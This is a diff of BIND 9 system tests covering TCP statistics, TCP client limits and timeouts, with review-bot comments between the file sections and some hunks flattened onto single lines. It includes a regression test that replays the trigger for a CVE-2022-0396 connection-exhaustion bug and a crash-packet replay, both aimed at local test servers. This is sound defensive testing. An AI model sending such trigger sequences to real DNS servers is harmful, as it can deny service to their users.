+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.7
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/tcp/prereq.sh b/bin/tests/system/tcp/prereq.sh
new file mode 100644
index 0000000..51e8c66
--- /dev/null
+++ b/bin/tests/system/tcp/prereq.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if ! test -n "$PYTHON"; then
+ echo_i "This test requires Python."
+ exit 1
+fi
+
diff --git a/bin/tests/system/tcp/setup.sh b/bin/tests/system/tcp/setup.sh
new file mode 100644
index 0000000..70aee8c
--- /dev/null
+++ b/bin/tests/system/tcp/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
diff --git a/bin/tests/system/tcp/tests.sh b/bin/tests/system/tcp/tests.sh
new file mode 100644
index 0000000..a24a199
--- /dev/null
+++ b/bin/tests/system/tcp/tests.sh
@@ -0,0 +1,204 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=../conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() { + "${DIG}" -p "${PORT}" "$@" +} + +rndccmd() { + "${RNDC}" -p "${CONTROLPORT}" -c ../common/rndc.conf -s "$@" +} + +status=0 +n=0 + +n=$((n + 1)) +echo_i "initializing TCP statistics ($n)" +ret=0 +rndccmd 10.53.0.1 stats || ret=1 +rndccmd 10.53.0.2 stats || ret=1 +mv ns1/named.stats ns1/named.stats.test$n +mv ns2/named.stats ns2/named.stats.test$n +ntcp10="$(grep "TCP requests received" ns1/named.stats.test$n | tail -1 | awk '{print $1}')" +ntcp20="$(grep "TCP requests received" ns2/named.stats.test$n | tail -1 | awk '{print $1}')" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking TCP request statistics (resolver) ($n)" +ret=0 +dig_with_opts @10.53.0.3 txt.example. > dig.out.test$n +sleep 1 +rndccmd 10.53.0.1 stats || ret=1 +rndccmd 10.53.0.2 stats || ret=1 +mv ns1/named.stats ns1/named.stats.test$n +mv ns2/named.stats ns2/named.stats.test$n +ntcp11="$(grep "TCP requests received" ns1/named.stats.test$n | tail -1 | awk '{print $1}')" +ntcp21="$(grep "TCP requests received" ns2/named.stats.test$n | tail -1 | awk '{print $1}')" +if [ "$ntcp10" -ge "$ntcp11" ]; then ret=1; fi +if [ "$ntcp20" -ne "$ntcp21" ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking TCP request statistics (forwarder) ($n)" +ret=0 +dig_with_opts @10.53.0.4 txt.example. 
> dig.out.test$n +sleep 1 +rndccmd 10.53.0.1 stats || ret=1 +rndccmd 10.53.0.2 stats || ret=1 +mv ns1/named.stats ns1/named.stats.test$n +mv ns2/named.stats ns2/named.stats.test$n +ntcp12="$(grep "TCP requests received" ns1/named.stats.test$n | tail -1 | awk '{print $1}')" +ntcp22="$(grep "TCP requests received" ns2/named.stats.test$n | tail -1 | awk '{print $1}')" +if [ "$ntcp11" -ne "$ntcp12" ]; then ret=1; fi +if [ "$ntcp21" -ge "$ntcp22" ];then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# -------- TCP high-water tests ---------- +refresh_tcp_stats() { + rndccmd 10.53.0.5 status > rndc.out.$n || ret=1 + TCP_CUR="$(sed -n "s/^tcp clients: \([0-9][0-9]*\).*/\1/p" rndc.out.$n)" + TCP_LIMIT="$(sed -n "s/^tcp clients: .*\/\([0-9][0-9]*\)/\1/p" rndc.out.$n)" + TCP_HIGH="$(sed -n "s/^TCP high-water: \([0-9][0-9]*\)/\1/p" rndc.out.$n)" +} + +# Send a command to the tool script listening on 10.53.0.6. +send_command() { + nextpart ans6/ans.run > /dev/null + echo "$*" | "${PERL}" "${SYSTEMTESTTOP}/send.pl" 10.53.0.6 "${CONTROLPORT}" + wait_for_log_peek 10 "result=" ans6/ans.run || ret=1 + if ! nextpartpeek ans6/ans.run | grep -qF "result=OK"; then + return 1 + fi +} + +# Instructs ans6 to open $1 TCP connections to 10.53.0.5. +open_connections() { + send_command "open" "${1}" 10.53.0.5 "${PORT}" || return 1 +} + +# Instructs ans6 to close $1 TCP connections to 10.53.0.5. +close_connections() { + send_command "close" "${1}" || return 1 +} + +# Check TCP connections are working normally before opening +# multiple connections +n=$((n + 1)) +echo_i "checking TCP query repsonse ($n)" +ret=0 +dig_with_opts +tcp @10.53.0.5 txt.example > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check TCP statistics after server startup before using them as a baseline for +# subsequent checks. 
+n=$((n + 1)) +echo_i "TCP high-water: check initial statistics ($n)" +ret=0 +refresh_tcp_stats +assert_int_equal "${TCP_CUR}" 0 "current TCP clients count" || ret=1 +# We compare initial tcp-highwater value with 1 because as part of the +# system test startup, the script start.pl executes dig to check if target +# named is running, and that increments tcp-quota by one. +assert_int_equal "${TCP_HIGH}" 1 "tcp-highwater count" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Ensure the TCP high-water statistic gets updated after some TCP connections +# are established. +n=$((n + 1)) +echo_i "TCP high-water: check value after some TCP connections are established ($n)" +ret=0 +OLD_TCP_CUR="${TCP_CUR}" +TCP_ADDED=9 +open_connections "${TCP_ADDED}" || ret=1 +check_stats_added() { + refresh_tcp_stats + assert_int_equal "${TCP_CUR}" $((OLD_TCP_CUR + TCP_ADDED)) "current TCP clients count" || return 1 + assert_int_equal "${TCP_HIGH}" $((OLD_TCP_CUR + TCP_ADDED)) "TCP high-water value" || return 1 +} +retry 2 check_stats_added || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Ensure the TCP high-water statistic remains unchanged after some TCP +# connections are closed. +n=$((n + 1)) +echo_i "TCP high-water: check value after some TCP connections are closed ($n)" +ret=0 +OLD_TCP_CUR="${TCP_CUR}" +OLD_TCP_HIGH="${TCP_HIGH}" +TCP_REMOVED=5 +close_connections "${TCP_REMOVED}" || ret=1 +check_stats_removed() { + refresh_tcp_stats + assert_int_equal "${TCP_CUR}" $((OLD_TCP_CUR - TCP_REMOVED)) "current TCP clients count" || return 1 + assert_int_equal "${TCP_HIGH}" "${OLD_TCP_HIGH}" "TCP high-water value" || return 1 +} +retry 2 check_stats_removed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Ensure the TCP high-water statistic never exceeds the configured TCP clients +# limit. 
+n=$((n + 1)) +echo_i "TCP high-water: ensure tcp-clients is an upper bound ($n)" +ret=0 +open_connections $((TCP_LIMIT + 1)) || ret=1 +check_stats_limit() { + refresh_tcp_stats + assert_int_equal "${TCP_CUR}" "${TCP_LIMIT}" "current TCP clients count" || return 1 + assert_int_equal "${TCP_HIGH}" "${TCP_LIMIT}" "TCP high-water value" || return 1 +} +retry 2 check_stats_limit || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check TCP connections are working normally before opening +# multiple connections +n=$((n + 1)) +echo_i "checking TCP response recovery ($n)" +ret=0 +# "0" closes all connections +close_connections 0 || ret=1 +dig_with_opts +tcp @10.53.0.5 txt.example > dig.out.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +#################################################### +# NOTE: The next test resets the debug level to 1. # +#################################################### + +n=$((n + 1)) +echo_i "checking that BIND 9 doesn't crash on long TCP messages ($n)" +ret=0 +# Avoid logging useless information. +rndccmd 10.53.0.1 trace 1 || ret=1 +{ $PERL ../packet.pl -a "10.53.0.1" -p "${PORT}" -t tcp -r 300000 1996-alloc_dnsbuf-crash-test.pkt || ret=1 ; } | cat_i +dig_with_opts +tcp @10.53.0.1 txt.example > dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tcp/tests_tcp.py b/bin/tests/system/tcp/tests_tcp.py new file mode 100644 index 0000000..3a0a7ae --- /dev/null +++ b/bin/tests/system/tcp/tests_tcp.py 
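Review bot: In the final check, `ret=1` in `{ $PERL ../packet.pl ... || ret=1 ; } | cat_i` is assigned on the left side of a pipeline, which most shells run in a subshell, so a failing packet.pl never reaches the `ret` that is tested afterwards and only the following dig decides the result. Taking the status outside the pipeline keeps it, for example `$PERL ../packet.pl ... > packet.out.test$n 2>&1 || ret=1` followed by `cat_i < packet.out.test$n` (the file name is illustrative and would need an entry in clean.sh). The script also runs under `set -e`, so the dig calls that lack `|| ret=1` (the resolver and forwarder checks and the first `+tcp @10.53.0.5` query) abort the whole run on failure instead of recording it in `status`.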
@@ -0,0 +1,70 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# pylint: disable=unused-variable + +import socket +import time + +import pytest + +pytest.importorskip("dns", minversion="2.0.0") +import dns.message +import dns.query + +TIMEOUT = 10 + + +def create_msg(qname, qtype, edns=-1): + msg = dns.message.make_query(qname, qtype, use_edns=edns) + return msg + + +def timeout(): + return time.time() + TIMEOUT + + +def create_socket(host, port): + sock = socket.create_connection((host, port), timeout=10) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True) + return sock + + +# Regression test for CVE-2022-0396 +def test_close_wait(named_port): + with create_socket("10.53.0.7", named_port) as sock: + msg = create_msg("a.example.", "A") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + msg = dns.message.make_query("a.example.", "A", use_edns=0, payload=1232) + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Shutdown the socket, but ignore the other side closing the socket + # first because we sent DNS message with EDNS0 + try: + sock.shutdown(socket.SHUT_RDWR) + except ConnectionError: + pass + except OSError: + pass + + # BIND allows one TCP client, the part above sends DNS messaage with EDNS0 + # after the first query. BIND should react adequately because of + # ns7/named.dropedns and close the socket, making room for the next + # request. If it gets stuck in CLOSE_WAIT state, there is no connection + # available for the query below and it will time out. 
+ with create_socket("10.53.0.7", named_port) as sock: + msg = create_msg("a.example.", "A") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) diff --git a/bin/tests/system/testcrypto.sh b/bin/tests/system/testcrypto.sh new file mode 100755 index 0000000..020aa9a --- /dev/null +++ b/bin/tests/system/testcrypto.sh 
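Review bot: `test_close_wait` contains no assertion, so the CVE-2022-0396 regression is detected only through a timeout exception from the last `dns.query.receive_tcp`, and any reply at all counts as a pass. An explicit check on the second connection, such as `assert response.is_response(msg)`, would state the expectation and remove the need for the file-wide `unused-variable` suppression on that line. Two smaller points: `except ConnectionError` followed by `except OSError` is redundant because ConnectionError is a subclass of OSError, so `except OSError: pass` covers both, and `create_socket` hard-codes `timeout=10` where the module constant `TIMEOUT` is available.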
@@ -0,0 +1,98 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=${SYSTEMTESTTOP:=..}
+prog=$0
+args=""
+quiet=0
+dir=""
+msg="cryptography"
+
+if test -z "$KEYGEN"; then
+ . $SYSTEMTESTTOP/conf.sh
+ alg="-a $DEFAULT_ALGORITHM -b $DEFAULT_BITS"
+else
+ alg=""
+ quiet=1
+ args="-q"
+fi
+
+while test "$#" -gt 0; do
+ case $1 in
+ -q)
+ if test $quiet -eq 0; then
+ args="$args -q"
+ quiet=1
+ fi
+ ;;
+ rsa|RSA|rsasha1|RSASHA1)
+ alg="-a RSASHA1"
+ msg="RSA cryptography"
+ ;;
+ rsasha256|RSASHA256)
+ alg="-a RSASHA256"
+ msg="RSA cryptography"
+ ;;
+ rsasha512|RSASHA512)
+ alg="-a RSASHA512"
+ msg="RSA cryptography"
+ ;;
+ ecdsa|ECDSA|ecdsap256sha256|ECDSAP256SHA256)
+ alg="-a ECDSAP256SHA256"
+ msg="ECDSA cryptography"
+ ;;
+ ecdsap384sha384|ECDSAP384SHA384)
+ alg="-a ECDSAP384SHA384"
+ msg="ECDSA cryptography"
+ ;;
+ eddsa|EDDSA|ed25519|ED25519)
+ alg="-a ED25519"
+ msg="EDDSA cryptography"
+ ;;
+ ed448|ED448)
+ alg="-a ED448"
+ msg="EDDSA cryptography"
+ ;;
+ *)
+ echo "${prog}: unknown argument"
+ exit 1
+ ;;
+ esac
+ shift
+done
+
+if test -z "$alg"; then
+ echo "${prog}: no algorithm selected"
+ exit 1
+fi
+
+if test -n "$TMPDIR"; then
+ dir=$(mktemp -d "$TMPDIR/XXXXXX")
+ args="$args -K $dir"
+fi
+
+if $KEYGEN $args $alg foo > /dev/null 2>&1
+then
+ if test -z "$dir"; then
+ rm -f Kfoo*
+ else
+ rm -rf "$dir"
+ fi
+else
+ if test $quiet -eq 0; then
+ echo_i "This test requires support for $msg" >&2
+ echo_i "configure with --with-openssl, or --enable-native-pkcs11" \
+ "--with-pkcs11" >&2
+ fi
+ exit 255
+fi
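Review bot: When `$KEYGEN` fails, the `else` branch exits with 255 without removing the directory created by `mktemp -d "$TMPDIR/XXXXXX"`, so every probe for an unsupported algorithm leaves a directory, possibly holding partial key material, behind in `$TMPDIR`. Adding `test -z "$dir" || rm -rf "$dir"` as the first line of that branch cleans it up on both paths. The `mktemp` result is also unchecked: if it fails, `dir` stays empty, `-K` is passed without a directory, and the success path then runs `rm -f Kfoo*` in the current directory; a guard such as `dir=$(mktemp -d "$TMPDIR/XXXXXX") || exit 1` avoids that.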
diff --git a/bin/tests/system/testsock.pl b/bin/tests/system/testsock.pl
new file mode 100755
index 0000000..e9448ed
--- /dev/null
+++ b/bin/tests/system/testsock.pl
@@ -0,0 +1,44 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# Test whether the interfaces on 10.53.0.* are up.
+
+require 5.001;
+
+use Socket;
+use Getopt::Long;
+
+my $port = 0;
+my $id = 0;
+GetOptions("p=i" => \$port,
+ "i=i" => \$id);
+
+my @ids;
+if ($id != 0) {
+ @ids = ($id);
+} else {
+ @ids = (1..8);
+}
+
+foreach $id (@ids) {
+ my $addr = pack("C4", 10, 53, 0, $id);
+ my $sa = pack_sockaddr_in($port, $addr);
+ socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp"))
+ or die "$0: socket: $!\n";
+ setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1));
+
+ bind(SOCK, $sa)
+ or die sprintf("$0: bind(%s, %d): $!\n",
+ inet_ntoa($addr), $port);
+ close(SOCK);
+}
diff --git a/bin/tests/system/testsock6.pl b/bin/tests/system/testsock6.pl
new file mode 100644
index 0000000..5903684
--- /dev/null
+++ b/bin/tests/system/testsock6.pl
@@ -0,0 +1,25 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+require 5.001;
+
+use IO::Socket::INET6;
+
+foreach $addr (@ARGV) {
+ my $sock;
+ $sock = IO::Socket::INET6->new(LocalAddr => $addr,
+ LocalPort => 0,
+ Proto => tcp)
+ or die "Can't bind : $@\n";
+ close($sock);
+}
diff --git a/bin/tests/system/testsummary.sh b/bin/tests/system/testsummary.sh
new file mode 100644
index 0000000..97b2716
--- /dev/null
+++ b/bin/tests/system/testsummary.sh
@@ -0,0 +1,86 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Creates the system tests output file from the various test.output.* files. It +# then searches that file and prints the number of tests passed, failed, not +# run. It also checks whether the IP addresses 10.53.0.[1-8] were set up and, +# if not, prints a warning. +# +# Usage: +# testsummary.sh [-n] +# +# -n Do NOT delete the individual test.output.* files after concatenating +# them into systests.output. +# +# Status return: +# 0 - no tests failed +# 1 - one or more tests failed + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +keepfile=0 + +while getopts "n" flag; do + case $flag in + n) keepfile=1 ;; + esac +done + +if [ `ls test.output.* 2> /dev/null | wc -l` -eq 0 ]; then + echowarn "I:No 'test.output.*' files were found." + echowarn "I:Printing summary from pre-existing 'systests.output'." +else + cat test.output.* > systests.output + if [ $keepfile -eq 0 ]; then + rm -f test.output.* + fi +fi + +status=0 +echoinfo "I:System test result summary:" +echoinfo "`grep 'R:[a-z0-9_-][a-z0-9_-]*:[A-Z][A-Z]*' systests.output | cut -d':' -f3 | sort | uniq -c | sed -e 's/^/I:/'`" + +FAILED_TESTS=`grep 'R:[a-z0-9_-][a-z0-9_-]*:FAIL' systests.output | cut -d':' -f2 | sort | sed -e 's/^/I: /'` +if [ -n "${FAILED_TESTS}" ]; then + echoinfo "I:The following system tests failed:" + echoinfo "${FAILED_TESTS}" + status=1 +fi + +CRASHED_TESTS=$(find . \( -name 'core' -or -name 'core.*' -or -name '*.core' \) ! 
-name '*.txt' | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /') +if [ -n "${CRASHED_TESTS}" ]; then + echoinfo "I:Core dumps were found for the following system tests:" + echoinfo "${CRASHED_TESTS}" +fi + +ASSERTION_FAILED_TESTS=`find . -name named.run | xargs grep "assertion failure" | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /'` +if [ -n "${ASSERTION_FAILED_TESTS}" ]; then + echoinfo "I:Assertion failures were detected for the following system tests:" + echoinfo "${ASSERTION_FAILED_TESTS}" +fi + +TSAN_REPORT_TESTS=`find . -name 'tsan.*' | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /'` +if [ -n "${TSAN_REPORT_TESTS}" ]; then + echoinfo "I:ThreadSanitizer reported issues for the following system tests:" + echoinfo "${TSAN_REPORT_TESTS}" +fi + +RESULTS_FOUND=`grep -c 'R:[a-z0-9_-][a-z0-9_-]*:[A-Z][A-Z]*' systests.output` +TESTS_RUN=`echo "${SUBDIRS}" | wc -w` +if [ "${RESULTS_FOUND}" -ne "${TESTS_RUN}" ]; then + echofail "I:Found ${RESULTS_FOUND} test results, but ${TESTS_RUN} tests were run" + status=1 +fi + +exit $status diff --git a/bin/tests/system/timeouts/clean.sh b/bin/tests/system/timeouts/clean.sh new file mode 100644 index 0000000..0da8a9c --- /dev/null +++ b/bin/tests/system/timeouts/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./ns*/managed-keys.bind* +rm -f ./ns*/named.conf +rm -f ./ns*/named.lock +rm -f ./ns*/named.memstats +rm -f ./ns*/named.run* +rm -f ./ns*/named.stats +rm -rf ./__pycache__ +rm -f ./ns*/large.db 
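Review bot: The assertion-failure scan in testsummary.sh, `find . -name named.run | xargs grep "assertion failure" | cut -d'/' -f2`, depends on grep prefixing every match with the file path, which it does not do when xargs hands it a single file; `cut` then works on the log line itself and the report shows a fragment of that line instead of a test name. `find . -name named.run -exec grep -l "assertion failure" {} + | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /'` lists the matching files directly and also copes with paths that contain spaces. Core dumps, assertion failures and ThreadSanitizer reports are printed but leave `status` at 0, so a run with crashes can still exit successfully unless the per-test results already record FAIL. If that is intended, a sentence under "Status return" in the header comment should say so.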
diff --git a/bin/tests/system/timeouts/ns1/example.db b/bin/tests/system/timeouts/ns1/example.db
new file mode 100644
index 0000000..cb321ff
--- /dev/null
+++ b/bin/tests/system/timeouts/ns1/example.db
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns1
+ns1 A 10.53.0.1
+@ A 10.53.0.1
+a A 10.53.0.1
+b A 10.53.0.1
+$INCLUDE large.db
diff --git a/bin/tests/system/timeouts/ns1/named.args b/bin/tests/system/timeouts/ns1/named.args
new file mode 100644
index 0000000..2df2be2
--- /dev/null
+++ b/bin/tests/system/timeouts/ns1/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 1 -D timeouts-ns1 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/timeouts/ns1/named.conf.in b/bin/tests/system/timeouts/ns1/named.conf.in
new file mode 100644
index 0000000..4b422e2
--- /dev/null
+++ b/bin/tests/system/timeouts/ns1/named.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ tcp-initial-timeout 20;
+ tcp-idle-timeout 50;
+ tcp-keepalive-timeout 70;
+ max-transfer-time-out 5; /* minutes */
+ max-transfer-idle-out 1; /* minutes */
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example." {
+ type primary;
+ file "example.db";
+ check-integrity no;
+};
diff --git a/bin/tests/system/timeouts/ns1/root.db b/bin/tests/system/timeouts/ns1/root.db
new file mode 100644
index 0000000..cb48acd
--- /dev/null
+++ b/bin/tests/system/timeouts/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.isc.org. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns1.example.
+ns1.example. A 10.53.0.1
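Review bot: The three TCP timers in named.conf.in, `tcp-initial-timeout 20; tcp-idle-timeout 50; tcp-keepalive-timeout 70;`, carry no unit comment, unlike the `/* minutes */` on the two transfer limits below them, and are easy to misread as seconds. They are in units of 100 ms, and as far as I know named raises a tcp-initial-timeout below 25 to the 2.5 s minimum, which is the figure the comment in tests_tcp_timeouts.py relies on. I would write `tcp-initial-timeout 20; /* 100 ms units; below the minimum of 25, so 2.5 s applies */` and add `/* 5 s */` and `/* 7 s */` to the other two. The `controls` statement also uses `allow { any; }` with the key from `../../common/rndc.key`, presumably a key that ships with the test suite, so a one-line comment marking this as valid only on the 10.53.0.x test addresses would keep it from being copied into a real configuration.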
diff --git a/bin/tests/system/timeouts/prereq.sh b/bin/tests/system/timeouts/prereq.sh
new file mode 100644
index 0000000..2204695
--- /dev/null
+++ b/bin/tests/system/timeouts/prereq.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if test -n "$PYTHON"
+then
+ if [ "$($PYTHON -c "import dns.version; print(dns.version.MAJOR)" 2> /dev/null)" -ge 2 ]
+ then
+ :
+ else
+ echo_i "This test requires the dnspython >= 2.0.0 module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+exit 0
diff --git a/bin/tests/system/timeouts/setup.sh b/bin/tests/system/timeouts/setup.sh
new file mode 100644
index 0000000..65bb057
--- /dev/null
+++ b/bin/tests/system/timeouts/setup.sh
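Review bot: When dnspython is missing, the command substitution in prereq.sh's `[ "$($PYTHON -c ...)" -ge 2 ]` is empty and `[` receives a non-numeric operand, so the script reaches the right branch only through a test(1) error whose message lands in the log ahead of the intended one. Capturing the version first, `major=$($PYTHON -c "import dns.version; print(dns.version.MAJOR)" 2>/dev/null) || major=0`, and then testing `[ "${major:-0}" -ge 2 ]` keeps the comparison well-formed. `$PYTHON` is expanded unquoted inside the command substitution, which is fine only while it holds a single path without spaces.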
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. ../conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+
+#
+# Generate a large enough zone, so the transfer takes longer than
+# tcp-initial-timeout interval
+#
+$PYTHON -c "
+from __future__ import print_function
+print('large IN TXT', end=' ')
+for a in range(128):
+ print('\"%s\"' % ('A' * 240), end=' ')
+print('')
+
+for a in range(150000):
+ print('%s IN NS a' % (a))
+ print('%s IN NS b' % (a))" > ns1/large.db
diff --git a/bin/tests/system/timeouts/tests_tcp_timeouts.py b/bin/tests/system/timeouts/tests_tcp_timeouts.py
new file mode 100644
index 0000000..d3ee357
